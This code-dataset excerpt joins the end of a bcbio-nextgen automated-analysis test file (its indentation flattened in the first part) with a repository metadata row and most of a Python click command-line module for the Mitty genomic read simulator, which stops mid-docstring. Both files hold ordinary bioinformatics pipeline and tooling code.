with make_workdir() as workdir:
cl = ["bcbio_nextgen.py",
get_post_process_yaml(self.data_dir, workdir),
os.path.join(self.data_dir, "run_info-bam.yaml")]
subprocess.check_call(cl)
@attr(speed=2)
def test_6_bamclean(self):
"""Clean problem BAM input files that do not require alignment.
"""
self._install_test_files(self.data_dir)
with make_workdir() as workdir:
cl = ["bcbio_nextgen.py",
get_post_process_yaml(self.data_dir, workdir),
os.path.join(self.data_dir, os.pardir, "100326_FC6107FAAXX"),
os.path.join(self.data_dir, "run_info-bamclean.yaml")]
subprocess.check_call(cl)
@attr(speed=2)
@attr(cancer=True)
@attr(cancermulti=True)
def test_7_cancer(self):
"""Test paired tumor-normal calling using multiple calling approaches: MuTect, VarScan, FreeBayes.
"""
self._install_test_files(self.data_dir)
with make_workdir() as workdir:
cl = ["bcbio_nextgen.py",
get_post_process_yaml(self.data_dir, workdir),
os.path.join(self.data_dir, "run_info-cancer.yaml")]
subprocess.check_call(cl)
@attr(cancer=True)
@attr(cancerpanel=True)
def test_7_cancer_nonormal(self):
"""Test cancer calling without normal samples or with normal VCF panels.
"""
self._install_test_files(self.data_dir)
with make_workdir() as workdir:
cl = ["bcbio_nextgen.py",
get_post_process_yaml(self.data_dir, workdir),
os.path.join(self.data_dir, "run_info-cancer2.yaml")]
subprocess.check_call(cl)
@attr(speed=1)
@attr(template=True)
def test_8_template(self):
"""Create a project template from input files and metadata configuration.
"""
self._install_test_files(self.data_dir)
fc_dir = os.path.join(self.data_dir, os.pardir, "100326_FC6107FAAXX")
with make_workdir() as workdir:
cl = ["bcbio_nextgen.py", "-w", "template", "--only-metadata",
"freebayes-variant",
os.path.join(fc_dir, "100326.csv"),
os.path.join(fc_dir, "7_100326_FC6107FAAXX_1_fastq.txt"),
os.path.join(fc_dir, "7_100326_FC6107FAAXX_2_fastq.txt"),
os.path.join(fc_dir, "8_100326_FC6107FAAXX.bam")]
subprocess.check_call(cl)
@attr(joint=True)
def test_9_joint(self):
"""Perform joint calling/backfilling/squaring off following variant calling.
"""
self._install_test_files(self.data_dir)
with make_workdir() as workdir:
cl = ["bcbio_nextgen.py",
get_post_process_yaml(self.data_dir, workdir),
os.path.join(self.data_dir, "run_info-joint.yaml")]
subprocess.check_call(cl)
@attr(docker=True)
def test_docker(self):
"""Run an analysis with code and tools inside a docker container.
Requires https://github.com/chapmanb/bcbio-nextgen-vm
"""
self._install_test_files(self.data_dir)
with make_workdir() as workdir:
cl = ["bcbio_vm.py",
"--datadir=%s" % self.data_dir,
"run",
"--systemconfig=%s" % get_post_process_yaml(self.data_dir, workdir),
"--fcdir=%s" % os.path.join(self.data_dir, os.pardir, "100326_FC6107FAAXX"),
os.path.join(self.data_dir, "run_info-bam.yaml")]
subprocess.check_call(cl)
@attr(docker_ipython=True)
def test_docker_ipython(self):
"""Run an analysis with code and tools inside a docker container, driven via IPython.
Requires https://github.com/chapmanb/bcbio-nextgen-vm
"""
self._install_test_files(self.data_dir)
with make_workdir() as workdir:
cl = ["bcbio_vm.py",
"--datadir=%s" % self.data_dir,
"ipython",
"--systemconfig=%s" % get_post_process_yaml(self.data_dir, workdir),
"--fcdir=%s" % os.path.join(self.data_dir, os.pardir, "100326_FC6107FAAXX"),
os.path.join(self.data_dir, "run_info-bam.yaml"),
"lsf", "localrun"]
subprocess.check_call(cl)
class CWLTest(unittest.TestCase):
    """ Run simple CWL workflows.
    Requires https://github.com/chapmanb/bcbio-nextgen-vm
    """

    def setUp(self):
        # Shared test input directory, as in AutomatedAnalysisTest.
        self.data_dir = os.path.join(os.path.dirname(__file__), "data", "automated")

    @attr(speed=2)
    @attr(cwl=True)
    @attr(cwl_local=True)
    def test_1_cwl_local(self):
        """Create a common workflow language description and run on local installation.
        """
        with make_workdir() as workdir:
            cl = ["bcbio_vm.py", "cwl", "../data/automated/run_info-cwl.yaml",
                  "--systemconfig", get_post_process_yaml(self.data_dir, workdir)]
            subprocess.check_call(cl)
            out_base = "run_info-cwl-workflow/main-run_info-cwl"
            cl = ["cwltool", "--verbose", "--preserve-environment", "PATH", "HOME", "--no-container",
                  out_base + ".cwl", out_base + "-samples.json"]
            subprocess.check_call(cl)
            # Fixed: these were Python 2 print statements; the parenthesized
            # forms behave identically under both Python 2 and Python 3.
            print("")
            print("To run with a CWL tool, cd test_automated_output and:")
            print(" ".join(cl))

    @attr(speed=2)
    @attr(cwl=True)
    @attr(cwl_docker=True)
    def test_2_cwl_docker(self):
        """Create a common workflow language description and run on a Docker installation.
        """
        with make_workdir() as workdir:
            cl = ["bcbio_vm.py", "cwl", "../data/automated/run_info-cwl.yaml",
                  "--systemconfig", get_post_process_yaml(self.data_dir, workdir)]
            subprocess.check_call(cl)
            out_base = "run_info-cwl-workflow/main-run_info-cwl"
            cl = ["cwltool", "--verbose", out_base + ".cwl", out_base + "-samples.json"]
            subprocess.check_call(cl)
            # Same Python 2 -> 2/3-compatible print conversion as above.
            print("")
            print("To run with a CWL tool, cd test_automated_output and:")
            print(" ".join(cl))
|
gifford-lab/bcbio-nextgen
|
tests/test_automated_analysis.py
|
Python
|
mit
| 16,978
|
[
"Galaxy"
] |
8ebacfc151a45e3a564a4d553de9e8216da9d3e02d9c0885c04df5367ca7a2ed
|
import logging
import os
import click
logger = logging.getLogger(__name__)
@click.group()
@click.version_option()
@click.option('-v', '--verbose', type=int, default=0)
def cli(verbose):
    """A genomic data simulator for testing and debugging bio-informatics tools"""
    # Map -v 0..3 onto increasing log detail; values above 3 clamp to DEBUG.
    levels = (logging.ERROR, logging.WARNING, logging.INFO, logging.DEBUG)
    logging.basicConfig(level=levels[min(verbose, 3)])

    # Deferred import: pkg_resources is only needed for the version banner.
    import pkg_resources  # part of setuptools
    dist_version = pkg_resources.require("Mitty")[0].version
    logger.debug('Mitty version {}'.format(dist_version))
@cli.command('filter-variants', short_help='Remove complex variants from VCF')
@click.argument('vcfin', type=click.Path(exists=True))
@click.argument('sample')
@click.argument('bed')
@click.argument('vcfout', type=click.Path())
def filter_vcf(vcfin, sample, bed, vcfout):
    """Subset VCF for given sample, apply BED file and filter out complex variants
    making it suitable to use for read generation"""
    # Thin CLI wrapper: all filtering logic lives in mitty.lib.vcfio.
    # The import is deferred so `mitty --help` stays fast.
    import mitty.lib.vcfio as mvio
    mvio.prepare_variant_file(vcfin, sample, bed, vcfout)
@cli.group('create-read-model', short_help='Create read model from different sources')
def create_read_model():
    # Pure click group node; subcommands (bam2illumina, synth-illumina) attach here.
    pass
@create_read_model.command('bam2illumina', short_help='Create read model from BAM file')
@click.argument('bam', type=click.Path(exists=True))
@click.argument('pkl')
@click.argument('desc')
@click.option('--every', type=int, default=1, help='Sample every nth read')
@click.option('--min-mq', type=int, default=0, help='Discard reads with MQ less than this')
@click.option('-t', '--threads', type=int, default=2, help='Threads to use')
@click.option('--max-bp', type=int, default=300, help='Maximum length of read')
@click.option('--max-tlen', type=int, default=1000, help='Maximum size of insert')
def bam2illumina(bam, pkl, desc, every, min_mq, threads, max_bp, max_tlen):
    """Process BAM file and create an empirical model of template length and base quality
    distribution. The model is saved to a Python pickle file usable by Mitty read generation programs."""
    import mitty.empirical.bam2illumina as b2m
    # max(1, every) guards against a nonsensical --every of 0 or negative.
    # max_bq=94 is fixed here rather than exposed as an option -- presumably the
    # model's BQ axis size; confirm against b2m.process_bam_parallel.
    b2m.process_bam_parallel(bam, pkl, model_description=desc, every=max(1, every), min_mq=min_mq,
                             threads=threads, max_bq=94, max_bp=max_bp, max_tlen=max_tlen)
@create_read_model.command('synth-illumina', short_help='Create fully synthetic Illumina-like read model')
@click.argument('pkl')
@click.option('--read-length', type=int, default=100)
@click.option('--mean-template-length', type=int, default=500)
@click.option('--std-template-length', type=int, default=50)
@click.option('--bq0', type=int, default=30, help='Maximum BQ')
@click.option('--k', type=float, default=200, help='Steepness of BQ curve. Larger => more steep')
@click.option('--sigma', type=float, default=10, help='Spread of BQ about mean value')
@click.option('--comment', help='Additional comments')
@click.option('--max-tlen', type=int, default=1000, help='Maximum template length we will generate')
def synth_read_model(pkl, read_length, mean_template_length, std_template_length, max_tlen, bq0, k, sigma, comment):
    """This generates a synthetic read model based on the parameters we pass it"""
    # Wrapper over the synthetic sequencer model builder; all parameters are
    # forwarded by keyword, so the signature's parameter order is irrelevant.
    import mitty.simulation.sequencing.syntheticsequencer as synth
    synth.create_model(
        pkl,
        read_length=read_length,
        mean_template_length=mean_template_length, std_template_length=std_template_length, max_tlen=max_tlen,
        bq0=bq0, k=k, sigma=sigma, comment=comment)
@cli.command('list-read-models')
@click.option('-d', type=click.Path(exists=True), help='List models in this directory')
def list_read_models(d):
    """List read models"""
    import pkg_resources
    import pickle
    import glob

    if d is None:
        # No directory given: list the models bundled with the package.
        if not pkg_resources.resource_isdir(__name__, 'data/readmodels/'):
            logging.error('Read model directory not found in distribution!')
            raise FileNotFoundError
        model_list = [
            pkg_resources.resource_filename(__name__, 'data/readmodels/' + model)
            for model in pkg_resources.resource_listdir(__name__, 'data/readmodels/')]
    else:
        model_list = glob.glob(os.path.join(d, '*'))

    for mod_fname in model_list:
        try:
            # Fixed: close the file handle explicitly (the original leaked the
            # handle from pickle.load(open(...))) and narrow the bare `except:`
            # to `except Exception` so KeyboardInterrupt/SystemExit still propagate.
            with open(mod_fname, 'rb') as in_handle:
                mod_data = pickle.load(in_handle)
            click.echo('\n----------\n{}:\n{}\n=========='.format(os.path.basename(mod_fname), mod_data['model_description']))
        except Exception:
            # Non-model files (wrong format, missing key) are skipped quietly.
            logging.debug('Skipping {}. Not a read model file'.format(mod_fname))
@cli.command('describe-read-model')
@click.argument('modelfile')
@click.argument('figfile')
def describe_read_model(modelfile, figfile):
    """Plot panels describing this model"""
    # get_read_model is a module-level helper defined elsewhere in this file;
    # it returns the read-simulation module and the loaded model data.
    read_module, model = get_read_model(modelfile)
    read_module.describe_model(os.path.basename(modelfile), model, figfile)
@cli.command()
def qname():
    """Display qname format"""
    # The format documentation string lives next to the FASTQ writer.
    from mitty.simulation.sequencing.writefastq import __qname_format_details__
    click.echo(__qname_format_details__)
def print_qname(ctx, param, value):
    # Eager click callback for the --qname flag on generate-reads: print the
    # qname documentation and exit without running the command.
    # ctx.resilient_parsing is True during shell completion -- do nothing then.
    if not value or ctx.resilient_parsing:
        return
    # NOTE(review): `qname` here is the click Command object defined above;
    # calling it invokes click's command machinery -- confirm intended.
    qname()
    ctx.exit()
@cli.command('generate-reads', short_help='Generate simulated reads.')
@click.argument('fasta')
@click.argument('vcf')
@click.argument('sample_name')
@click.argument('bed')
@click.argument('modelfile')
@click.argument('coverage', type=float)
@click.argument('seed', type=int)
@click.argument('fastq1', type=click.Path())
@click.argument('longqname', type=click.Path())
@click.option('--fastq2', type=click.Path())
@click.option('--flat-coverage', is_flag=True, help='If set ensure perfectly uniform coverage')
@click.option('--truncate-to', type=int, help='Truncate all reads to these many bp (If set)')
@click.option('--unpair', is_flag=True, help='unpair reads for models that normally produce paired reads')
@click.option('--threads', default=2)
@click.option('--qname', is_flag=True, callback=print_qname, expose_value=False, is_eager=True, help='Print documentation for information encoded in qname')
def generate_reads(fasta, vcf, sample_name, bed, modelfile,
                   coverage, seed,
                   fastq1, longqname, fastq2,
                   flat_coverage, truncate_to, unpair,
                   threads):
    """Generate simulated reads"""
    import mitty.simulation.readgenerate as reads

    # --flat-coverage selects a model variant via the sub_type suffix;
    # get_read_model is a module-level helper defined elsewhere in this file.
    read_module, model = get_read_model(modelfile, sub_type='-flat-coverage' if flat_coverage else '')
    reads.process_multi_threaded(
        fasta, vcf, sample_name, bed, read_module, model, coverage,
        fastq1, longqname, fastq2,
        truncate_to=truncate_to,
        unpair=unpair,
        threads=threads, seed=seed)
@cli.command('corrupt-reads', short_help='Apply corruption model to FASTQ file of reads')
@click.argument('modelfile')
@click.argument('fastq1_in', type=click.Path(exists=True))
@click.argument('fastq1_out', type=click.Path())
@click.argument('sidecar_in', type=click.Path(exists=True))
@click.argument('sidecar_out', type=click.Path())
@click.argument('seed', type=int)
@click.option('--fastq2-in', type=click.Path(exists=True))
@click.option('--fastq2-out', type=click.Path())
@click.option('--threads', default=2)
def read_corruption(modelfile, fastq1_in, fastq1_out, sidecar_in, sidecar_out, seed, fastq2_in, fastq2_out, threads):
    """Apply corruption model to FASTQ file of reads"""
    # Sidecar files carry qnames longer than the FASTQ limit; the corruption
    # model from `modelfile` is applied to reads in parallel.
    import mitty.simulation.readcorrupt as rc
    read_module, read_model = get_read_model(modelfile)
    rc.multi_process(read_module, read_model, fastq1_in, fastq1_out, sidecar_in, sidecar_out,
                     fastq2_in, fastq2_out, processes=threads, seed=seed)
def print_variant_model_list(ctx, param, value):
    # Eager click callback for --list-models: dump each variant model's
    # docstring and exit. NOTE: the import runs even during resilient parsing
    # (shell completion) because it precedes the guard.
    import mitty.simulation.genome.simulatevariants as simvar
    if not value or ctx.resilient_parsing:
        return
    for k in sorted(simvar.model_dispatch.keys()):
        print('{}:\n------'.format(k))
        print(simvar.model_dispatch[k].__doc__)
        print()
    ctx.exit()
@cli.command('sample-genome', short_help='Sample variants to create an individual')
@click.argument('vcf', type=click.Path(exists=True))
@click.argument('vcf-out', type=click.File('w'))
@click.option('--sample-name', type=str, default="HG")
@click.option('--default-allele-freq', default=0.01, type=float)
@click.option('--seed-for-random-number-generator', type=int)
def sample_genome_cmd(vcf, vcf_out, sample_name, default_allele_freq, seed_for_random_number_generator):
    """Generates a VCF with random GT information based on the allele frequency (AF) of the variants. If AF is not present
    for a variant, it uses default allele frequency. If a variant in input VCF contains multiallelics,
    only the first ALT will be used.
    """
    # Renamed from `simulate_variants`: the later `simulate-variants` command
    # reused that function name and shadowed this one at module level. Click
    # captured the callback at decoration time, so CLI behavior is unchanged.
    import mitty.simulation.genome.sampledgenome as sample_genome
    sample_genome.assign_random_gt(input_vcf=vcf, output=vcf_out, sample_name=sample_name,
                                   default_af=default_allele_freq, seed=seed_for_random_number_generator)
@cli.command('simulate-variants', short_help='Create a fully simulated VCF')
@click.argument('vcfout', type=click.File('w'))
@click.argument('fasta', type=click.Path(exists=True))
@click.argument('sample')
@click.argument('bed', type=click.Path(exists=True))
@click.argument('seed', type=int)
@click.option('--p-het', default=0.6, type=float, help='Probability for heterozygous variants')
@click.option('--model', type=(str, float, int, int), multiple=True, help='<model type> <p> <min-size> <max-size>')
@click.option('--list-models', is_flag=True, callback=print_variant_model_list, expose_value=False, is_eager=True, help='Print list of variant models')
def simulate_variants(vcfout, fasta, sample, bed, seed, p_het, model):
    """Generates a VCF with simulated variants. The program carries three basic models for variant simulation
    - SNPs, insertions and deletions and is invoked as follows:
    \b
    mitty -v4 simulate-variants \
    - \ # Write the VCF to std out
    ~/Data/human_g1k_v37_decoy.fasta \
    mysample \ # The name of the sample to add to
    region.bed \
    7 \ # This is the random number generator seed
    --p-het 0.6 \ # The probability for heterozygous variants
    --model SNP 0.001 1 1 \ # <model type> <p> <min-size> <max-size>
    --model INS 0.0001 10 100 \
    --model DEL 0.0001 10 100 | bgzip -c > sim.vcf.gz
    """
    # `model` is a tuple of (type, p, min_size, max_size) tuples, one per
    # repeated --model option; dispatching happens inside simvar.main.
    import mitty.simulation.genome.simulatevariants as simvar
    simvar.main(fp_out=vcfout, fasta_fname=fasta, sample_name=sample, bed_fname=bed, seed=seed, p_het=p_het, models=model)
@cli.command('god-aligner', short_help='Create a perfect BAM from simulated FASTQs')
@click.argument('fasta', type=click.Path(exists=True))
@click.argument('fastq1', type=click.Path(exists=True))
@click.argument('sidecar_in', type=click.Path(exists=True))
@click.argument('bam')
@click.option('--fastq2', type=click.Path(exists=True), help='If a paired-end FASTQ, second file goes here')
@click.option('--sample-name', default='S', help='If supplied, this is put into the BAM header')
@click.option('--platform-name', default='Illumina', help='If supplied, this is put into the BAM header')
@click.option('--cigar-v2', is_flag=True, help='Write out CIGARs in V2 for')
@click.option('--max-templates', type=int, help='For debugging: quits after processing these many templates')
@click.option('--threads', default=2)
@click.option('--do-not-index', is_flag=True, help='Leave the unsorted BAM fragments as is. Required if using an external tool to merge + sort + index')
def god_aligner(fasta, bam, sample_name, platform_name, fastq1, sidecar_in, fastq2,
                cigar_v2,
                max_templates,
                threads,
                do_not_index):
    """Given a FASTA.ann file and FASTQ made of simulated reads,
    construct a perfectly aligned BAM from them.
    A BAM produced by an aligner from the same FASTQ can be diff-d against the perfect BAM
    to check for alignment accuracy. (Also see the mitty filter-bam tool)
    The perfect BAM is also useful for testing variant callers by removing the aligner from the
    pipeline and reducing one moving part.
    Note: The program uses the fasta.ann file to construct the BAM header"""
    # Reads carry their true positions in the qname, so alignment is just a
    # transcription step; all work happens in the benchmarking helper.
    import mitty.benchmarking.god_aligner as god
    god.process_multi_threaded(
        fasta, bam, fastq1, sidecar_in, fastq2, threads, max_templates, platform_name, sample_name,
        cigar_v2=cigar_v2,
        do_not_index=do_not_index)
@cli.group('debug', short_help='Alignment and variant calling debugging tools')
def debug_tools():
    # Pure click group node for the `mitty debug ...` subcommands.
    pass
@debug_tools.group('variant-call-analysis', short_help="Characterize TP, FN, FP and GT calls (and hence P/R) by variant size")
def variant_call_analysis():
    # Pure click group node; `process` and `plot` subcommands attach here.
    pass
@variant_call_analysis.command('process', short_help="Process EVCF, characterize calls by variant size and plot")
@click.argument('evcf', type=click.Path(exists=True))
@click.argument('out', type=click.Path())
@click.option('--region-label', help='Name of high confidence region if desired')
@click.option('--max-size', type=int, default=50, help='Maximum size of variant to consider')
@click.option('--title', help='Title for the plot')
@click.option('--fig-file', type=click.Path(), help='If supplied, plot will be saved here')
@click.option('--plot-bin-size', type=int, help='Bin size (bp)')
def vc_process(evcf, out, region_label, max_size, title, fig_file, plot_bin_size):
    # Characterize an evaluation VCF by variant size, write a CSV to `out`,
    # then plot (figure only saved when --fig-file is given).
    import mitty.benchmarking.evcfbysize as ebs
    data = ebs.main(evcf_fname=evcf, out_csv_fname=out,
                    max_size=max_size, high_confidence_region=region_label)
    ebs.plot(data, fig_fname=fig_file, bin_size=plot_bin_size, title=title)
@variant_call_analysis.command('plot', short_help="Plot P/R from existing data file.")
@click.argument('datafile', type=click.Path(exists=True))
@click.argument('fig-file', type=click.Path())
@click.option('--title', help='Title for the plot')
@click.option('--plot-bin-size', type=int, help='Bin size (bp)')
@click.option('--plot-range', type=int, help='Range (bp) of indels to show')
def vc_plot(datafile, fig_file, title, plot_bin_size, plot_range):
    # Renamed from `vc_process`: the original duplicated (and shadowed) the
    # `process` subcommand's function name. Click captured each callback at
    # decoration time, so CLI behavior is unchanged.
    # Reload the CSV written by `process` (TP/FN/GT/FP counts per size bin)
    # and render the precision/recall figure.
    import mitty.benchmarking.evcfbysize as ebs
    data = ebs.np.loadtxt(datafile, skiprows=1, delimiter=',', dtype=[('TP', int), ('FN', int), ('GT', int), ('FP', int)])
    ebs.plot(data, fig_fname=fig_file, bin_size=plot_bin_size, plot_range=plot_range, title=title)
@debug_tools.command('variant-by-size', short_help="Characterize variant size distribution in a VCF")
@click.argument('vcf', type=click.Path(exists=True))
@click.argument('out', type=click.Path())
@click.option('--max-size', type=int, default=50, help='Maximum size of variant to consider')
@click.option('--title', help='Title for the plot')
@click.option('--fig-file', type=click.Path(), help='If supplied, plot will be saved here')
@click.option('--plot-bin-size', type=int, help='Bin size')
@click.option('--replot', is_flag=True,
              help='If supplied, instead of reprocessing the vcf, we expect "out" to exist, and load data from there')
def variant_by_size(vcf, out, max_size, title, fig_file, plot_bin_size, replot):
    # Either recompute the size distribution from the VCF (caching it to
    # `out`), or with --replot reload the cached numbers; then optionally plot.
    import mitty.benchmarking.vsizedistrib as vsd
    if replot:
        data = vsd.np.loadtxt(out, skiprows=1, delimiter=',', dtype=int)
    else:
        data = vsd.main(vcf_fname=vcf, max_size=max_size)
        vsd.np.savetxt(out, data, fmt='%d', delimiter=', ', header='SIZE')
    if fig_file is not None:
        vsd.plot(data, fig_fname=fig_file, bin_size=plot_bin_size, title=title)
@debug_tools.command('call-fate', short_help="Tracks fate of TP, FN, FP .. between two eval VCFs")
@click.argument('vcfa', type=click.Path(exists=True))
@click.argument('vcfb', type=click.Path(exists=True))
@click.argument('vcfout', type=click.File('w'))
@click.argument('summaryout', type=click.File('w'))
@click.option('--region-label', help='Name of high confidence region if desired')
def call_fate(vcfa, vcfb, vcfout, summaryout, region_label):
    """This tool tracks the fate of every variant call across the two supplied files and divides
    the calls up into the following 12 transitions
    \b
    Improvements
    ------------
    FN -> TP
    FN -> GT
    GT -> TP
    FP -> N (FP calls removed)
    \b
    Status quo
    ----------
    TP -> TP
    FN -> FN
    GT -> GT
    FP -> FP
    \b
    Regressions
    -----------
    TP -> FN
    TP -> GT
    GT -> FN
    N -> FP (New FP calls)
    """
    # Thin wrapper; comparison logic and output formatting live in callfate.
    import mitty.benchmarking.callfate as cf
    cf.main(fname_a=vcfa, fname_b=vcfb, vcf_out=vcfout, summary_out=summaryout, high_confidence_region=region_label)
def partition_bam_choices():
    # Called at import time to populate click.Choice for the partition-bams
    # `criterion` argument; returns the available scoring-function names.
    from mitty.benchmarking.partition_bams import scoring_fn_dict
    return scoring_fn_dict.keys()
def print_partion_bam_criteria(ctx, param, value):
    # Eager click callback for --criteria: print each scoring criterion's
    # description and exit. NOTE(review): "partion" is a typo for "partition",
    # but the name is referenced by the partition-bams decorator below, so it
    # cannot be renamed in isolation.
    if not value or ctx.resilient_parsing:
        return
    from mitty.benchmarking.partition_bams import scoring_fn_dict
    for k, v in scoring_fn_dict.items():
        # v is a (scoring_fn, description) pair -- only the description prints.
        print('{}: {}\n'.format(k, v[1]))
    ctx.exit()
@debug_tools.command('partition-bams', short_help="Given two or more BAMs partition them into mutually exclusive sets")
@click.argument('outprefix')
@click.argument('criterion', type=click.Choice(partition_bam_choices()))
@click.option('--threshold', type=float, default=10)
@click.option('--sidecar_in', type=click.Path(exists=True))
@click.option('--bam', type=click.Path(exists=True), multiple=True, help='BAMs to partition')
@click.option('--criteria', is_flag=True, callback=print_partion_bam_criteria, expose_value=False, is_eager=True, help='Print documentation for criteria')
def partition_bams(outprefix, criterion, threshold, sidecar_in, bam):
    """
    An example command line for this tool is:
    \b
    mitty -v4 debug partition-bams
    myderr \\
    d_err --threshold 10 \\
    --sidecar_in lq.txt --bam bwa_1.5.bam --bam bwa_10.bam --bam bwa_20.bam
    This command line asks the tool to use |d_err| < 10 as the set membership function. We are passing it three BAM files
    (the file names refer to the `-r` values we passed `bwa mem` (1.5, 10 and 20)) and `lq.txt` is the sidecar file carrying
    the qnames > 254 characters (as described previously).
    This tool produces a summary file `myderr_summary.txt` that looks like:
    \b
    (A)(B)(C) 22331
    (A)(B)C 234
    (A)B(C) 0
    (A)BC 3
    A(B)(C) 0
    A(B)C 0
    AB(C) 208
    ABC 199126
    In this nomenclature A is the set and (A) is the complement of this set. The set labels A, B, C ... (upto a maximum of 10)
    refer to the BAM files in sequence, in this case 1.5, 10 and 20.
    Thus, ABC means all the reads which have a |d_err| < 10 in all the three files. AB(C) means all the reads which have
    a |d_err| < 10 in A and B but not C, and so on. A reader familiar with Venn diagrams is refered to the chart in the docs
    for a translation of the three dimensional case to a three way Venn diagram. Higher dimensions are harder to visualize
    as Venn diagrams.
    The tool also produces a set of files following the naming convention:
    \b
    myderr_(A)(B)(C)_A.bam
    myderr_(A)(B)(C)_B.bam
    myderr_(A)(B)(C)_C.bam
    myderr_(A)(B)C_A.bam
    myderr_(A)(B)C_B.bam
    myderr_(A)(B)C_C.bam
    ...
    The first part of the name follows the convention outlined above. The trailing A, B, C refer to the orginal source BAM of
    the reads. So `myderr_(A)(B)(C)_B.bam` carries reads from bam B that have |d_err| >= 10 in all the three BAMs.
    The criteria the `partition-bam` tool can be run on can be obtained by passing it the `--criteria` option.
    """
    # All set arithmetic and BAM writing happens in the benchmarking helper;
    # `bam` is a tuple of paths from the repeated --bam option.
    import mitty.benchmarking.partition_bams as pbm
    pbm.main(bam_in_l=bam, out_prefix=outprefix, criterion=criterion, threshold=threshold, sidecar_fname=sidecar_in)
@debug_tools.command('bam-to-truth', short_help="from input bam with mapping quality threshold to produce truth fastq and its long qname file")
@click.argument('bam_fpath_in',type=click.Path(exists=True))
@click.argument('mq_threshold',type=int)
@click.argument('sample_name')
@click.argument('output_prefix')
def bam_to_truth(bam_fpath_in,mq_threshold,sample_name,output_prefix):
    """
    Given bam file and mapping quality threshold ,the tool outputs 2 fastqs with their longqnames
    if both paired mate and the read have mq above.Also adds sample_name to output.
    For qname format specification, check mitty Readme.MD documentation.
    """
    # Thin wrapper around the benchmarking helper of the same name.
    # NOTE(review): the docstring above is the CLI help text (typos included);
    # left byte-identical to avoid changing user-visible output.
    import mitty.benchmarking.bam_to_truth as btt
    btt.bam_to_truth(bam_fpath_in,mq_threshold,sample_name,output_prefix)
@debug_tools.group('alignment-analysis', short_help='Plot various alignment metrics from BAM')
def alignment_analysis():
    """Computes a three dimensional histogram of alignment metrics from a BAM of simulated reads
    \b
    The dimensions are:
    [0] Xd - alignment error -max_xd, ... 0, ... +max_xd, wrong_chrom, unmapped
    (2 * max_xd + 3)
    [1] MQ - mapping quality 0, ... max_MQ
    (max_MQ + 1)
    [2] vlen - length of variant carried by read
    Ref, < -max_vlen , -max_vlen, ... 0, ... +max_vlen, > +max_vlen
    ( 2 * max_vlen + 1 + 2 + 1)"""
    # Pure click group node; `process` and `plot` subcommands attach here.
    pass
@alignment_analysis.command('process', short_help='Compute alignment metrics from BAM and plot')
@click.argument('bam', type=click.Path(exists=True))
@click.argument('long_qname_file', type=click.Path(exists=True))
@click.argument('out', type=click.Path())
@click.option('--max-d', type=int, default=200, help='Range of d_err to consider')
@click.option('--max-size', type=int, default=50, help='Maximum size of variant to consider')
@click.option('--fig-prefix', type=click.Path(), help='If supplied, a series of plots will be saved with this prefix')
@click.option('--plot-bin-size', default=1, type=int, help='Bin size')
@click.option('--strict-scoring', is_flag=True, help="Don't consider breakpoints when scoring alignment")
@click.option('--processes', default=2, help='How many processes to use for computation')
def alignment_debug_plot(bam, long_qname_file, out, max_d, max_size, fig_prefix, plot_bin_size, strict_scoring, processes):
    """Computes 3D matrix of alignment metrics (d_err, MQ, v_size) saves it to a numpy array file and produces a set
    of summary figures"""
    # For automated workflows we sometimes have real (not simulated) data. For such workflows we simply
    # plot a placeholder figure to include in reports by passing a dummy long qname with the magic word
    # 'deadbeef' in it
    # Fixed: the original leaked the file handle (open(...).read()); use a
    # context manager so it is closed deterministically.
    with open(long_qname_file, 'r') as in_handle:
        sentinel = in_handle.read().strip()
    if sentinel == 'deadbeef':
        if fig_prefix is not None:
            import mitty.benchmarking.plot.placeholderfigure as phf
            phf.placeholder_figure('NOT SIMULATED READS', fig_prefix=fig_prefix)
        # NOTE(review): exit() relies on the site module's builtin; sys.exit()
        # or ctx.exit() would be more robust -- behavior kept as-is.
        exit(0)
    import mitty.benchmarking.xmv as xmv
    xmv_mat = xmv.main(bam, sidecar_fname=long_qname_file,
                       max_xd=max_d, max_vlen=max_size, strict_scoring=strict_scoring,
                       processes=processes)
    xmv.save(xmv_mat, out)
    if fig_prefix is not None:
        xmv.plot_figures(xmv_mat, fig_prefix=fig_prefix, plot_bin_size=plot_bin_size)
@alignment_analysis.command('plot', short_help='Plot alignment metrics from existing data file')
@click.argument('datafile', type=click.Path(exists=True))
@click.argument('fig-prefix', type=click.Path())
@click.option('--plot-bin-size', default=1, type=int, help='Bin size')
def alignment_plot(datafile, fig_prefix, plot_bin_size):
    """Produces a set of alignment metric summary figures from existing data file"""
    # Renamed from `alignment_debug_plot`: the original duplicated (and
    # shadowed) the `process` subcommand's function name. Click captured each
    # callback at decoration time, so CLI behavior is unchanged.
    import mitty.benchmarking.xmv as xmv
    xmv_mat = xmv.np.load(datafile)
    xmv.plot_figures(xmv_mat, fig_prefix=fig_prefix, plot_bin_size=plot_bin_size)
@debug_tools.command('subset-bam', short_help="Subset a BAM based on d_err and variant size")
@click.argument('bamin', type=click.Path(exists=True))
@click.argument('sidecar', type=click.Path(exists=True))
@click.argument('bamout', type=click.Path())
@click.option('--d-range', type=(int, int), default=(-200, 200))
@click.option('--reject-d-range', is_flag=True, help='Reject reads inside the range instead of outside')
@click.option('--v-range', type=(int, int), default=(-200, 200))
@click.option('--reject-v-range', is_flag=True, help='Reject reads inside the range instead of outside')
@click.option('--reject-reads-with-variants', is_flag=True, help='Reject any reads carrying variants')
@click.option('--reject-reference-reads', is_flag=True, help='Reject reads with no variants')
@click.option('--do-not-index', is_flag=True, help='Do not index BAM file')
@click.option('--strict-scoring', is_flag=True, help="Don't consider breakpoints when scoring alignment")
@click.option('--processes', default=2, help='How many processes to use for computation')
def subset_bam(bamin, sidecar, bamout,
               d_range, reject_d_range,
               v_range, reject_v_range,
               reject_reads_with_variants, reject_reference_reads,
               strict_scoring,
               do_not_index, processes):
  """Produce a subset of an input BAM based on d_err and variant size"""
  import mitty.benchmarking.subsetbam as sub

  # Validate the CLI arguments before doing any work
  assert d_range[0] <= d_range[1], f'd_range error ({d_range})'
  assert v_range[0] <= v_range[1], f'v_range error ({v_range})'
  assert not (reject_reads_with_variants and reject_reference_reads), 'Can not reject both variant and reference reads'

  # Collect the filter configuration in one place, then hand off to the worker
  filter_opts = dict(
    bam_fname=bamin, sidecar_fname=sidecar, out_fname=bamout,
    d_range=d_range, reject_d_range=reject_d_range,
    v_range=v_range, reject_v_range=reject_v_range,
    reject_reads_with_variants=reject_reads_with_variants,
    reject_reference_reads=reject_reference_reads,
    strict_scoring=strict_scoring, do_not_index=do_not_index,
    processes=processes)
  sub.main(**filter_opts)
def get_read_model(modelfile, sub_type=''):
  """Return read module and model data given modelfile

  :param modelfile: name of a built-in model (resolved under data/readmodels/)
                    or a literal path to a pickled model file
